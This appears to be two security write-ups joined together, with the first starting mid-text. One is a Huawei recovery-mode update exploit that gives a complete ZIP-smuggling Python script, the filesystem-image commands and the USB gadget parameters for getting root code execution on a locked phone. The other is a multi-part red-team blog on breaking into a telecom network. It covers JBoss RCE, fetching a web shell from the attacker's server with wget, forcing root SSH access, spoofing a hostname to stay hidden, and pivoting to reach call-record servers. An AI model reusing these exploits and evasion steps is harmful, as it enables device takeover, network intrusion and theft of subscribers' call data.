cp arch/arm64/boot/dts/overlays/*.dtb* /mnt/boot/overlays/
cp arch/arm64/boot/dts/overlays/README /mnt/boot/overlays/

PATH=$PATH make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- INSTALL_MOD_PATH=/mnt/root modules_install

umount /dev/mmcblk0p1
umount /dev/mmcblk0p2

Finally we put the SD card back into the RPi and boot it.

Crafting the Update Archive

Recall that we have three phases of the update process separated by the mount actions: the first one checks software version for compatibility of the update with the device, the second verifies the update cryptographically, the third applies the update. We are going to construct a “frankenZIP” update archive which can presents itself in different ways throughout the update phases using our FaultyUSB to achieve our goal.

It may seem logical at first that in the first two steps (compatibility check, signature verification) we can use the same thing, since we just need a valid update archive that is both signed and has a matching version for the given device. However, the second phase of the update process is actually more convoluted as it performs multiple sub-checks: in addition to the Android-specific update signature verification, there is another important phase of the verification stage, which is the authentication token checking.

The authentication token is a cryptographically signed token, infeasible to forge, but it only applies to the OTA update archives, the SD-type updates are not checked for auth tokens. SD updates are most likely meant to be installed locally, e.g. literally from an SD-card, so there is no Huawei server to be involved in accepting the update process and issuing an auth-token.

It is possible to find an OTA update archive for a specific device, because the end user must be able to update their phone, so there must be a way to publicly access the OTA updates. Unfortunately SD updates are more difficult to find, we only managed to find a few model-version combinations on Android file hosting sites. Analyzing update archives of different types and versions we found that Huawei is using the so-called 

hotakey_v2
 RSA key in broad ranges of devices as the Android-specific signing key: both an SD update for LIO EMUI 11 and the latest HarmonyOS updates for NOH are signed with this key. This means that an update archive for a different model and older OS version may still pass the cryptographic verification successfully even on devices with a fresh HarmonyOS version.

Also, there are some recent changes in the update archive content: the newer update archives (both OTAs and SDs) have begun to utilize the 

packageinfo.mbn
 version description file, which is also checked during in the verification stage. If this file exists, a more thorough version-compatibility test is performed: e.g. when it defines an “Upgrade” field and the installed OS has a greater version number than the current update has, the update process is aborted. However, the check is skipped if this file is missing – which is exactly the case with the pre-HarmonyOS updates, e.g. the EMUI 11 SD update archives don’t have the 
packageinfo.mbn
 file.

Solving on all those constraints eventually we were able to find a publicly available file on a firmware sharing site (named 

Huawei Mate 30 Pro Lion-L29 hw eu LIO-L29 11.0.0.220(C432E7R8P4)_Firmware_EMUI11.0.0_05016HEY.zip
), which contains the SD update of LIO-L29 11.0.0.220 version. There are three ZIP files in an SD update: base, preload, and cust package. Each of them are signed. We selected the cust package to be the foundation of the PoC, because of its tiny (14 KB) size.

This file is perfect for the second phase of the update (verification), but it would obviously not have the correct 

SOFTWARE_VER_LIST.mbn
 for our target devices. That’s why the exploit has to present the external media differently between phases 1 and 2 as well: first we will produce the variant that will have the desired 
SOFTWARE_VER_LIST.mbn
, but in the second phase we will produce the previously mentioned SD update archive file for EMUI 11, that passes not only signature verification, but also bypasses the authentication token and the 
packageinfo
 requirement. However, this original archive file is not used exactly “as-is” for phase two: we must make a change to it so that it still passes verification in phase two while also contains the arbitrary binary to be executed in the third phase (code execution).

Creating such a static “frankenZIP” that can produce multiple contents depending on update stage was the main point of our previous publication — see the UnZiploc presentation on exploiting CVE-2021-40045. The key to it is the way the parsing algorithm of the Android-specific signature footer works. The implementation still enables us to make a gap between the end of the actual ZIP file and the beginning of the whole-file PKCS#7 signature. This gap is a No man’s land in the sense that the ZIP parsers omit it, as it is technically part of the ZIP comment field; likewise the signature verifier also skips it, because the signature field is aligned to the end of the file. However (and this is why we needed a new vulnerability compared to the previous report) statically smuggling a ZIP file inside the gap area would no longer be possible, since the fix Huawei employed, i.e. searching for the ZIP End of Central Directory marker in the archive’s comment field, is an effective mitigation.

This EOCD searching happens in the verification phase, just before the Android-specific signature checking. This means that during the verification phase a pristine update archive must be used (apart from the fact that it is still possible to create a gap between the signature and the end of the ZIP data).

Therefore, the idea is to utilize the patched mass storage functionality of the Linux kernel to hide the injected ZIP inside the update archive exactly when the update process reaches the verification phase. This is done by masking the payload area with zeros, so when a read-access occures at the end of the ZIP file during the EOCD searching phase of verification process, the phone will read zeros in the No man’s land and therefore the new fix will not cause an assertion. However, reading the ZIP file in the third phase, the smuggled content will be provided and therefore (similarly to the previous vulnerability), the modified 

update-binary
 will end up being executed.

The content of the crafted ZIP file can be restricted to a minimal file set, to only those which are essential to pass the sanity (

META-INF/CERT.RSA
SD_update.tag
) and version (
SOFTWARE_VER_LIST.mbn
) checks during the update process. Supported models depend on the content of the 
SOFTWARE_VER_LIST.mbn
 file, where model codenames, geographical revision, and a minimally supported firmware version are listed. The 
update-binary
contains the arbitrary code that will be executed.

Here is the ZIP-smuggling generator (

smuggle_zip_inplace.py
), which takes a legitimate signed ZIP archive as a base and inject into it the previously discussed minimal file set and a custom binary to be executed.

import argparse
import struct
import zipfile
import io
import os


if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="poc update.zip repacker")
	parser.add_argument("file", type=argparse.FileType("r+b"), help="update.zip file to be modified")
	parser.add_argument("update_binary", type=argparse.FileType("rb"), help="update binary to be injected")
	parser.add_argument("-g", "--gap", default="-1", help="gap between EOCD and signature (-1: maximum)")
	parser.add_argument("-o", "--ofs", default="-1", help="payload offset in the gap")
	args = parser.parse_args()

	gap_size = int(args.gap, 0)
	payload_ofs = int(args.ofs, 0)

	args.file.seek(0, os.SEEK_END)
	original_size = args.file.tell()
	args.file.seek(-6, os.SEEK_END)
	signature_size, magic, comment_size = struct.unpack("<HHH", args.file.read(6))
	assert magic == 0xffff

	print(f"comment size   = {comment_size}")
	print(f"signature size = {signature_size}")

	# get the signature
	args.file.seek(-signature_size, os.SEEK_END)
	signature_data = args.file.read(signature_size - 6)

	# prepare the gap to where the payload will be placed
	# (gap is the new comment size - signature size)
	if gap_size == -1:
		gap_size = 0xffff - signature_size
	assert gap_size + signature_size <= 0xffff

	# automatically set the payload offset to be 0x1000-byte aligned
	if payload_ofs == -1:
		payload_ofs = (comment_size - original_size) & 0xfff

	print(f"gap size       = {gap_size}")
	print(f"payload offset = {payload_ofs}")

	# trucate the ZIP at the end of the signed data
	args.file.seek(-(comment_size + 2), os.SEEK_END)
	end_of_signed_data = args.file.tell()
	args.file.truncate(end_of_signed_data)

	# write the new (original ZIP's) EOCD according to the updated gap size
	args.file.write(struct.pack("<H", gap_size + signature_size))

	# gap before filling
	args.file.write(b"\x00"*(payload_ofs))

	# write a marker before the injected payload
	args.file.write(b"=PAYLOAD-BEGIN=\x00")

	# generate the injected ZIP payload
	z = zipfile.ZipFile(args.file, "w", compression=zipfile.ZIP_DEFLATED)
	# ensure the CERT.RSA has a proper length, the content is irrelevant
	z.writestr("META-INF/CERT.RSA", b"A"*1300)

	# the existence of this file make authentication tag verification skipped for OTA
	z.writestr("skipauth_pkg.tag", b"")
	
	# get the update binary to be executed
	z.writestr("META-INF/com/google/android/update-binary", args.update_binary.read())
	
	# some more files are necessary for an "SD update"
	known_version_list = [
		b"LIO-LGRP2-OVS 102.0.0.1",
		b"LIO-LGRP2-OVS 11.0.0",
		b"NOH-LGRP2-OVS 102.0.0.1",
		b"NOH-LGRP2-OVS 11.0.0",
	]
	z.writestr("SOFTWARE_VER_LIST.mbn", b"\n".join(known_version_list)+b"\n")
	z.writestr("SD_update.tag", b"SD_PACKAGE_BASEPKG\n")
	z.close()

	# write a marker after the injected payload
	args.file.write(b"==PAYLOAD-END==\x00")

	payload_size = args.file.tell() - (end_of_signed_data + 2) - payload_ofs

	assert payload_size + payload_ofs < gap_size, f"{payload_size} + {payload_ofs} < {gap_size}"

	# gap after filling
	args.file.write(b"\x00"*(gap_size - payload_ofs - payload_size))

	# signature
	args.file.write(signature_data)

	# footer
	args.file.write(struct.pack("<HHH", signature_size, 0xffff, gap_size + signature_size))

Regarding the actual content of the PoCs: because a mass storage device has no immediate understanding on higher levels, like file system or even files, it can only operate on raw storage level, so the output of the PoCs should be in fact a raw file system image. Here is below the file system image generation script, where the 

update_sd_base.zip
 archive is the 
cust
 part of the aformentioned LIO update and the 
update-binary-poc
the ELF executable to be run. The 
update-binary-poc
 is the static aarch64 ELF file, which finally gets 
execve
by the recovery, thus reaching arbitrary code execution as root. Also note that the output image (
file_system.img
) only contains a pure file system, and has no proper partition table.

python3 smuggle_zip_inplace.py update_sd_base.zip update-binary-poc
dd if=/dev/zero of=file_system.img bs=1M count=10
mkfs.exfat file_system.img
mkdir -p mnt
sudo mount -o loop,rw,nosuid,nodev,relatime,uid=1000,gid=1000,fmask=0022,dmask=0022,iocharset=utf8 -t exfat file_system.img mnt
mkdir -p mnt/dload
dd if=/dev/zero of=mnt/padding_between_exfat_headers_and_update_archive bs=1M count=1
sudo umount mnt
rmdir mnt

python -c 'd=open("file_system.img","rb").read();o=d.find("update_sd_base".encode("utf-16le"));b=d.find(b"=PAYLOAD-BEGIN=");e=d.find(b"==PAYLOAD-END==")+16;print(f"sudo rmmod g_mass_storage; sudo modprobe g_mass_storage file=/home/pi/file_system.img trigger_counter=4 trigger_offset=0x{o:x} payload_offset=0x{b:x} payload_size={e-b}")'

The file systems are tiny, just about 10 MB in size and formatted in exFAT. To have a proper offset-distance between the file system metadata (e.g. the file node descriptor) and the actual update archive, a 1 MB zero filled dummy file is inserted first. This is only a precaution to avoid the Linux kernel to cache the beginning of the update archive when it reads the file system metadata part.

The final step of the PoC build process automatically constructs a command which can be used to set the patched mass storage device parameters with the correct trigger and payload parameters. The trigger condition is defined as a read event at file decriptor of the 

update_sd_base.zip
 file, because the file path of the update archive must be resolved into a file node by file system, so the file metadata must be read before the actual file content. Also the trigger counter parameter is empirically set as a constant based on the observed number of mount events, directory listings and file stats prior to the verification stage.

Leveraging Arbitrary Code Execution

Gaining root level code exec is nice and normally one would like to open a reverse shell to make use of it, but the recovery mode in which the update runs leaves us a very restricted environment in terms of external connections. However, as we already detailed in the UnZiploc presentation last year, the recovery mode by design can make use of WiFi to realize a “phone disaster recovery” feature, in which it download the OTA over internet directly from the recovery. So we could make use of the WiFi chip to connect to our AP and thus make the reverse shell possible. The exact PoC code is not disclosed here, it is left as an exercise for the reader 🙂

Running the PoC

After building the PoC the resulting file system image file is transferred to the Raspberry Pi and then loaded as the USB mass storage kernel module on the RPi, e.g.:

sudo rmmod g_mass_storage
sudo modprobe g_mass_storage \
  file=/home/pi/file_system.img \
  trigger_counter=4 trigger_offset=0x204042 \
  payload_offset=0x308000 payload_size=3672

Then we connect the RPi with the target phone with the USB-C cable and simply trigger the update process. This can be done in different ways, depending on the lock state of the device.

If the phone is unlocked (i.e. you are trying to root your own phone :), once the phone recognizes the USB device, a notification appears and the file explorer now can list the content of our 10 MB emulated flash drive. Then the dialer can be used to access the ProjectMenu application by dialing 

*#*#2846579#*#*
 (or in case of a tablet use the calculator in landscape mode and write 
()()2846579()()
), then select “4. Software Upgrade”, and then “1. Memory card Upgrade”.

More interestingly, if the phone credentials are not known, so the screen can’t be unlocked to access the ProjectMenu application, the SD update method is still reachable via the eRecovery menu, by powering the phone on while by pressing the Power and Volume Up buttons.

Because the trigger counter can be in an indefinite state after the normal mode Android read the external media, it is very important to execute the same kernel module unloader and loader command again while the phone reboots! This way the trigger counter is only affected by the update process, thus it works correctly.

The update process itself should be fairly quick, as the whole archive is just a few KBs, so the PoC code gets executed shortly, in a few seconds, after entering the recovery mode.

To close things out, here is a video capture of the exploit 🙂

How I hacked into a Telecom Network — Part 1 (Getting the RCE)

Original text by Harpreet Singh

TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.

Hi everyone, this is my first post on Medium and I hope you guys enjoy reading it! There is a lot of information that I had to redact because of the sensitive nature of this info. (I’m apologizing in advance 😅 )

Introduction

So there I was doing a Red Team Engagement for a client a while back. I was asked to get inside the network and reach to the Call Data Records (CDRs) for the telecom network. People who don’t know what CDR is, here’s a good explanation for it (shamelessly copied from Wikipedia) —

call detail record (CDR) is a data record produced by a telephone exchange or other telecommunications equipment that documents the details of a telephone call or other telecommunications transaction (e.g., text message) that passes through that facility or device. The record contains various attributes of the call, such as time, duration, completion status, source number, and destination number.

In all my other engagements, this holds a special place. Getting the initial foothold was way too easy (simple network service exploitation to get RCE) but the issue was with the stable shell.

In this blog post (not a tutorial), I want to share my experience on how I went from a Remote Code Execution (RCE) to proxified internal network scans in a matter of minutes.

Reconnaissance

Every ethical hacker/penetration tester/bug bounty hunter/red teamer knows the importance of Reconnaissance. The phrase “give me six hours to chop down a tree and I will spend the first four sharpening the axe” sits perfectly over here. The more extensively the reconnaissance is done, the better odds for exploitation is.

So for the RTE, the obvious choices for recon were: DNS enumerations, ASN & BGP lookups, some passive recons from multiple search engines, checking out source code repositories such as GitHub, BitBucket, GitLab, etc. for something juicy, doing some OSINT on employees for spear phishing in case there was no RCE found. (Trust me when I say this, fooling an employee to download & execute malicious documents is easy to do but only if you could overcome the obstacles — AVs & Email Spam Filters)

There are just so many sources from where you can recon for a particular organization. In my case, I started off with the DNS enumeration itself.

aiodnsbrute -v -t 7000 — no-verify -w dns-list.uniq.lst ******.com.** | grep -v Timeout | grep -v Misformatted | grep -v exception

Fun fact: The wordlist I used has 2.77 million unique DNS records.

Most of the bounty hunters will look for port 80 or 443 for all the sub-domains found. The thing is, sometimes it’s better to perform a full port scan just to be on the safe side. In my case, I found a sub-domain e[REDACTED]-nms.[REDACTED].com.[REDACTED] and after a full port scan, I got some interesting results.

The ports 12000/tcp and 14000/tcp were nothing special but 14100/tcp, let’s just say this was my lucky day!!

J-Fuggin-Boss!!

Remote Code Execution

From here on, everyone who has exploited the infamous JBoss vulnerabilities before knows how things will move forward. For newbies, if you haven’t had the experience with JBoss exploitation, you can check out the following links to help you out with the exploitation:

JBoss-Bridging-the-Gap-Between-the-Enterprise-and-You

hacking_and_securing_jboss

For JBoss exploitation, you can use Jexboss. There are many methods and exploitation techniques included in the tool and it also covers the Application and Servlet deserializations and Struct2. You can exploit JBoss using Metasploit as well, though I prefer Jexboss.

Continuing with the engagement, once I discovered JBoss, I quickly fired up Jexboss for the exploitation. The tool was easy to use.

./jexboss.py -u http://[REDACTED]:14100/

As we can see from the above screenshot, the server was vulnerable. Using the JMXInvokerServlet method, I was then able to get the Remote Code Execution on the server. Pretty straight forward exploitation! Right?

You must be thinking, that was no advance level shit, so what’s different about this post?

Patience guys!

Now that I had the foothold, the actual issue arose. Of course like always, once I had the RCE I tried getting a reverse shell.

and I even got a back connection!

However, the shell was not stable and the python process was getting killed after a few seconds. I even tried using other reverse shell one-liner payloads, different common ports, even UDP too, but the result was the same. I also tried reverse_tcp/http/https Metasploit payloads in different forms to get meterpreter connections but the meterpreter shells were disconnected after a few seconds.

I have experienced some situations like these before and I always questioned what if I’m not able to get a reverse shell, how will I proceed?

Entering Bind shell connection over HTTP tunnel!

How I hacked into a Telecom Network — Part 2 (Playing with Tunnels: TCP Tunneling)

TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.

Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, now getting issue with the reverse shell.

Now that when I tried getting a stable reverse shell, I failed. The other idea that came to my mind was getting a bind shell (getting SSH over HTTP for stability purpose) instead of reverse over HTTP (TCP Tunnel over HTTP). But what exactly am I achieving here?

TCP Tunnel over HTTP (for TCP stability purpose + Stealthy SSH connection (over TCP Tunnel created) + SOCKS Tunnel (Dynamic SSH Tunnel) for internal network scan using Metasploit = Exploiting internal network service to exfil data via these recursive tunnels.

Looks very complex? Let’s break it down into multiple steps:

  1. First, I created a bridge between my server and the NMS server so that it should support communication for different protocols other than just HTTP/HTTPS(>L2 for now) [TCP Tunnel over HTTP]
  2. Once the bridge (TCP Tunnel over HTTP) was created, I configured and implemented SSH Port Forwarding from my server (2222/tcp) to the NMS server (22/tcp) so that I could connect to the NMS server via SSH over HTTP. (SSH over TCP over HTTP to be precise) Note: The SSH service on the NMS server was running on 127.0.0.1
  3. I then, configured the NMS SSH server to allow root login and generate SSH private key (copy my Public Key to authorized_hosts file) for access to the NMS server via SSH.
  4. I checked SSH connection to NMS using the private key and when it worked, I then created a Dynamic SSH Tunnel (SOCKS) to proxify Metasploit over SSH Tunnel (Metasploit over SSH Tunnel over TCP Tunnel over HTTP to be precise).

I want to blog it step by step on how I created the tunnels and the way I played with them.

Tunneling 101

A tunneling protocol is a communications protocol that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network (such as the Internet) through a process called encapsulation. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, it can hide the nature of the traffic that is run through a tunnel.
The tunneling protocol works by using the data portion of a packet (the payload) to carry the packets that actually provide the service. Tunneling uses a layered protocol model such as those of the OSI or TCP/IP protocol suite, but usually violates the layering when using the payload to carry a service not normally provided by the network. Typically, the delivery protocol operates at an equal or higher level in the layered model than the payload protocol.
Source: Wikipedia

So basically the idea is to use the webserver as an intermediate proxy to forward all the network packets (TCP packets) from the webserver to the internal network.

Forwarding TCP packets to the internal network through the web server using the HTTP protocol

TCP tunneling can help you in situations where you have restricted port access and filtered egress traffic. In my case, there was not much filtering however, I used this technique to get stable shell access.

Now that I already had an RCE on the server and that too with the “root” privilege. I quickly used this opportunity to create a JSP based shell using ABPTTS

A Black Path Toward The Sun (ABPTTS)

As explained in the GitHub repo,

ABPTTS uses a Python client script and a web application server page/package to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server.

Currently, only JSP/WAR and ASP.NET server-side components are supported by this tool.

So the idea was to create a JSP based shell using ABPTTS and upload it to the web server, let the tool connect with the JSP shell, and create a TCP tunnel over HTTP to create a secure shell (SSH) between my system and the server.

python abpttsfactory.py -o jexws4.jsp

When the shell got generated using ABPTTS, the tool created a configuration file to be used for creating the TCP tunnel over HTTP/HTTPS.

I then uploaded the JSP shell to the server using wget. Note: The jexws4.war shell is a package for Jexboss. When you exploit the JBoss vulnerability via Jexboss, the tool will upload its own WAR shell to the server. In my case, I just tried to find this WAR/JSP shell (jexws4.jsp) and replace it with the ABPTTS shell

wget http://[MY SERVER]/jexws4.jsp -O <location of jexws4.jsp shell on NMS server>

Once the ABPTTS shell got uploaded onto the server, I quickly confirmed it on Jexboss by executing a random command to see the output. Why? Now that the Jexboss shell was overwritten by the ABPTTS shell, no matter what command I executed, the output was always the hash printed out due to the ABPTTS shell.

As you can see from the above screenshot, when I executed the “id” command, I got a weird hash in return that proves the ABPTTS shell was uploaded successfully!

Now that I had a TCP tunnel over HTTP configured, the next thing I wanted to do was tunnel the SSH port running on the server (22/tcp on NMS) and bind the port to my system (2222/tcp). Why? so that I could connect to NMS via SSH. Did you notice what I was trying to do here?

SSH port forwarding (not yet tunneled) via TCP tunnel over HTTP

Even though I had yet to configure the SSH part on the NMS and on my own server for the SSH Tunnel. For now, I just prepared the port forwarding mechanism so that I could reach the local port 22/tcp on NMS from my server using port 2222/tcp

python abpttsclient.py -c <location of config file> -u <ABPTTS shell URL> -f 127.0.0.1:2222/127.0.0.1:22

I checked my connections table to check if the port is properly forwarded or not. As you can see in the below screenshot, my server’s port 2222/tcp was in the LISTEN state.

The next thing to do now is configuring the SSH server to connect to the NMS and start a Dynamic SSH Tunnel (SOCKS). I’ll cover this in the next post:

How I hacked into a Telecom Network — Part 3 (Playing with Tunnels: Stealthy SSH & Dynamic Tunnels)

TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.

Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, implemented TCP tunnel over HTTP for Shell Stability.

DISCLAIMER: This post is quite lengthy so just sit back,be patient and enjoy the ride!

In the previous part, I mentioned the steps I followed and I configured TCP Tunnel over HTTP and SSH port forwarding to access port 22/tcp of NMS server from my server using port 2222/tcp. In this blog post, I’ll show how I implemented SSH Dynamic Tunnels for further network exploitation.

Stealthy SSH Access

When you’re connected to an SSH server, the connection details are saved in a log file. To check these connection details, you can execute the ‘w’ command in *nix systems.

The command w on many Unix-like operating systems provides a quick summary of every user logged into a computer, what each user is currently doing, and what load all the activity is imposing on the computer itself. The command is a one-command combination of several other Unix programs: whouptime, and ps -a. Source: Wikipedia

So basically, the source IP is saved which is dangerous for a red teamer. As this was a RTE, I could not take the chance of letting the admin know about my C2 location. (don’t worry, the ABPTTS shell that I used was connected from my server and I already bought a domain for IDN Homograph attacksto reduce my chances of detection)

For the stealthy connection to work, I checked the hosts file to gather more information and I found that this server is being used quite heavily inside the network.

Such a server was already being monitored so I was thinking of ways to be as stealthy as possible in such a scenario. NMS was already monitoring the network so I thought it must be monitoring itself that includes all the network connections to/from the server. This means I can’t use a normal port scan using the TCP tunnel over HTTP.

How about encrypting the communication between my server and the NMS server using SSH? But for SSH connection, my hostname/IP will be stored in the log files, and also the username would be easy to identify.

In this case, my server’s username was ‘harry’, and generating a key for this user which I’ll store in the authorized_keys file was not a good option.

And then I came up with an Idea (in steps),

  1. Create the user ‘nms’ (this user was already created in the NMS server) on my server.
  2. Change my server’s hostname from OPENVPN to [REDACTED]_NMS[REDACTED]. (the same as the NMS server)
  3. Generate SSH keys for ‘nms’ user on my server and copy the public key in the NMS server. (authorized_keys)
  4. Configure the SSH server running on NMS to enable root login (PermitRootLogin), TCP port forwarding & gateway ports. (SSH -g switch just in case)
  5. Configure the NMS server to act as a SOCKS proxy for my further network exploitation. (Dynamic SSH Tunnel)
  6. The SOCKS tunnel is encrypted now and I can use this tunnel to do an internal network scan using Metasploit.

Implementation time!

I began by first adding the user ‘nms’ on my server so that I could generate the user-specific SSH keys.

I even changed the hostname of my server with the exact same for the NMS server so that when I log in using SSH, the logs will show a user login entry as nms@[REDACTED]_NMS[REDACTED]

Next, I generated the SSH Keys for ‘nms’ user on my server.

I also had to change the SSH configurations on the NMS server so I downloaded the sshd_config file from the server and changed few things inside.

AllowTCPForwarding: This option is used to enable TCP port forwarding via SSH.

GatewayPorts: This option enables the port binding to interfaces other than loopback on remote ports. (I’m enabling this option just in case if I want a reverse shell from other internal systems on this server which will forward the shell to me via Reverse Port Forwarding)

PermitRootLogin: This option permits the client to connect to the SSH server using ‘root’.

StrictModes: This option specifies whether SSH should check the user’s permissions in their home directory before accepting login.

Now that the configuration was done, I quickly uploaded (more like overwrite) the sshd_config file on to the NMS server.

And I also copied the SSH public key to ‘root’ user’s authorized_keys file

After everything was set, I then tried a test connection just to check if I’m able to do SSH using ‘root’ on the NMS server or not!

Booyah! 😎😎😎

SSH over TCP over HTTP (SSH port forward over TCP Tunnel created over HTTP connection via ABPTTS shell (JSP))

Dynamic Port Forwarding (Dynamic SSH Tunnels)

Let’s see what Wikipedia had to say about this —

Dynamic port forwarding (DPF) is an on-demand method of traversing a firewall or NAT through the use of firewall pinholes. The goal is to enable clients to connect securely to a trusted server that acts as an intermediary for the purpose of sending/receiving data to one or many destination servers.

DPF can be implemented by setting up a local application, such as SSH, as a SOCKS proxy server, which can be used to process data transmissions through the network or over the Internet.

Once the connection is established, DPF can be used to provide additional security for a user connected to an untrusted network. Since data must pass through the secure tunnel to another server before being forwarded to its original destination, the user is protected from packet sniffing that may occur on the LAN.

So all I had to do was create a Dynamic SSH Tunnel so that the NMS server would act as a SOCKS proxy server. Some of the benefits I had for using a SOCKS tunnel:

  1. Got indirect access to other network devices/servers through the NMS server (NMS server becomes the gateway for me)
  2. Because of the Dynamic SSH Tunnel, all the traffic originating from my server to the NMS server got encrypted (used SSH connection, remember?)
  3. Even if a server admin sits on the NMS server and monitors the network, he won’t be able to exactly find the root cause right away. (A dedicated one would definitely join the dots)
  4. The connection was stable (thanks to HTTP Keep-Alive), now all these recursive tunnels were running smoothly without any connection drop because of the TCP Tunnel that I implemented over HTTP.

When I logged in to the NMS server over SSH, here’s what the ‘w’ command showed me:

Now all I had to do was create the SOCKS tunnel and which I did using the command: ssh -NfCq -D 9090 -i <private key/identity file> <user@host> -p <ssh custom port>

The ‘PermitRootLogin’ was changed in sshd_config file for this purpose (to log in to the NMS server as root).

Worried what the server admin would think about the setup? Generally, when SSH connections are opened, server admin sometimes checks the username that logged in, the authorized keys that were used to log in but most of the time, he checks the hostname/IP from where the connection was initiated.

In my case, I initiated the connection from my server where the address was 127.0.0.1 using port 2222/tcp (thanks to TCP tunnel over HTTP) to the NMS server with destination address as 127.0.0.1 (again!). Now because of this setup, all he would see is a connection initiated by the NMS server to the NMS server SSH using the authorized keys (the public key) stored as user ‘nms’ (that’s why I created the same user on my host to generate the keys) and even if the admin checked the known_hosts file, all he would see is ‘nms@[REDACTED]_NMS[REDACTED]’ user connected to the SSH with IP as 127.0.0.1 which was already a user profile in the NMS server.

To confirm the SOCKS tunnel, I checked the connection table on my server and port 9090/tcp was in the LISTEN state.

Awesome! The SOCKS Tunnel is ready!

All that was left for me was to use the SOCKS tunnel for Metasploit for further network exploitation which I’ll cover in the next post (the final part):

Pro Tip!

When you connect to a server over SSH, a pseudo TTY is automatically allocated. Of course, this doesn’t happen when you’re executing commands via SSH (one-liners). So whenever you want to tunnel through SSH or create a SOCKS tunnel, try the -T switch to disable the pseudo TTY allocation. You can also use the below command:

ssh -NTfCq -L <local port forwarding> <user@host>
ssh -NTfCq -D <Dynamic port forwarding> <user@host>

To check all the SSH switches you can refer to the SSH manual (HIGHLY RECOMMENDED!). When creating a tunnel with the switches (showed above), you can create a tunnel without a TTY allocation and the tunneled port will work just fine!

How I hacked into a Telecom Network — Part 4 (Getting Access to CDRs, SS7 applications & VLRs)


TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.

Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, implemented TCP tunnel over HTTP for Shell Stability.

In the previous part (Playing with Tunnels: Stealthy SSH & Dynamic SSH Tunnels), I mentioned the steps I followed to create SSH Tunnels with stealthy SSH access from my server using port 2222/tcp. In this blog post, I’ll show how I used the SOCKS Tunnel for internal network reconnaissance and to exploit internal servers to get access to the CDRs stored in a server.

Situational Awareness (Internal Network)

During the engagement, I was able to create a Dynamic SSH tunnel via TCP tunnel over HTTP, and believe me when I say this, the shell was neat!

Moving forward, I then configured the SOCKS tunnel over port 9090/tcp and then connected proxychains for NMap scans.

Though I prefer Metasploit instead of NMap as it gave me more coverage over scans and I was able to manage the internal IP scans easily with it. To use the proxies for all the modules I used the “setg Proxies socks4:127.0.0.1:9090” command (to set proxy option globally). I looked for internal web servers so I used auxiliary/scanner/http/http_version module.

Because of setg, the Proxies option was already set, now all I needed to do was just give the IP subnet range and run the module.

I found some Remote Management Controllers (iRMC), some SAN switches (switchExplorer.html), and a JBoss Instance …

There’s another JBoss instance used internally? 🤣

Exploiting Internal Network Service

So there was another JBoss Instance running on port 80/tcp on an internal IP 10.x.x.x. So all I had to do was use proxychains and run JexBoss once more on the internal IP (I could have also used -P switch in JexBoss to provide the proxy address).

This was an easy win for me as the internal JBoss server running was also vulnerable and due to that, I was able to get RCE from my pivotal machine (initial foothold machine) to the next internal JBoss server 😎

Awesome! Now, when I got the shell, I used the following command to list down all the files and directories under the /home/<user> location in a structured way:

cd /home/<user> | find . -print | sed -e “s;[^/]*/;|_ _ _ _;g;s;_ _ _ _|; |;g” 2>&1

In the output, I found an interesting .bat file — ss7-cli.bat (The script configures the SS7 Management Shell Bootstrap Environment)

In the same Internal JBoss server, a Visitor Location Register (VLR) console client application was also stored to access the VLR information from the database.

What’s SS7?


Signaling System №7
 (SS7) is a set of telephony signaling protocols developed in 1975, which is used to set up and tear down telephone calls in most parts of the world-wide public switched telephone network (PSTN). The protocol also performs number translation, local number portability, prepaid billing, Short Message Service (SMS), and other services. Source: Wikipedia

To monitor the SS7/ISDN links and decode the protocol standards and generate CDRs for billing purposes, a console client is required that will interact with the system.

You may ask why there was an SS7 client application running on JBoss? One word — “Mobicents”

Mobicents

Mobicents is an Open Source VoIP Platform written in Java to help create, deploy, manage services and applications integrating voice, video, and data across a range of IP and legacy communications networks. Source: Wikipedia

Mobicents enables the composition of Service Building Blocks (SBB) such as call control, billing, user provisioning, administration, and presence-sensitive features. This makes Mobicents servers an easy choice for telecom Operations Support Systems (OSS) and Network Management Systems (NMS). Source: design.jboss.org

So it looks like the internal JBoss server is running a VoIP gateway application (SIP server) that is interacting with the Public Switched Telephone Network (PSTN) using SS7. (This was tiring to get to know the internal network structure without any kind of network architecture diagram)

Going beyond

While doing some more recon in the internal JBoss application running a VoIP gateway, I found that there were some internal gateway servers, CDR backup databases, FTP servers that stored backup configurations of SS7 and USSD protocol, etc.(Thanks to /etc/hosts)

rom the hosts file, I found a lot of FTP servers which at first I didn’t really felt important but then I found the CDR-S and CDR-L FTP servers. These servers were storing the backup CDR S-Records and CDR L-Recordsrespectively.

You can read more about these records from hereCDR S-Records: Page 157 & CDR L-Records: Page 168

Using Metasploit, I quickly scanned these FTP servers and checked for their authenticated status.

The FTP servers were accessible without any kind of authentication 🤣🤣

Maybe the FTP servers were used for internal use by VoIP applications or something else but still, a win is a win!

